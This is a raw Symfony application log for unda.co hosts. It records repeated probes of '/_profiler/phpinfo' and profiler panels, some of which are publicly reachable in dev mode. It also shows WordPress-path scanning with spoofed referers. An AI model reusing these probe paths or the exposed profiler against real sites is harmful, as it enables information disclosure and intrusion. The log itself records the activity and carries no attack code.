[2025-12-20 11:32:43] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:32:43] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:32:43] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:32:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 11:32:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:33:00] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:33:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:33:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:33:00] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:33:00] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:33:00] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:33:00] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:33:02] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:33:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:34:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
[2025-12-20 11:34:54] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:35:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 11:37:17] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 11:37:17] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 11:37:19] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 11:37:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 11:37:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=swiftmailer","method":"GET"} []
[2025-12-20 11:37:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 11:38:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"486bc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/486bc0?panel=request","method":"GET"} []
[2025-12-20 11:38:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 11:40:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=logger","method":"GET"} []
[2025-12-20 11:40:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 11:40:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:40:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:40:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:40:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:40:33] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:40:35] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:40:36] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:40:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:40:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:40:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:40:36] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:40:38] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:40:41] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:40:41] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:40:41] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:41] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:41] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:40:41] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:40:41] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:40:43] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:40:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:40:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:43] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:43] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:40:43] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:40:43] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:40:44] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 11:40:44] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 11:40:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:40:57] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:40:57] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:40:57] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:57] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:40:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:40:57] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:40:57] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:40:57] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:41:00] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:41:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:41:04] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:41:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:41:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:41:04] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:41:04] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:41:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:41:04] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:41:06] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:41:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:41:18] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:41:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:41:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:41:18] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:41:18] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:41:18] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:41:18] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:41:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 11:41:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:41:31] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:41:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:41:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:41:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:41:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:41:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:41:31] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:41:33] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:41:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:42:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:42:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f03987","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f03987","method":"GET"} []
[2025-12-20 11:42:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 11:43:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=twig","method":"GET"} []
[2025-12-20 11:43:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 11:45:14] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-20 11:45:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-20 11:45:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
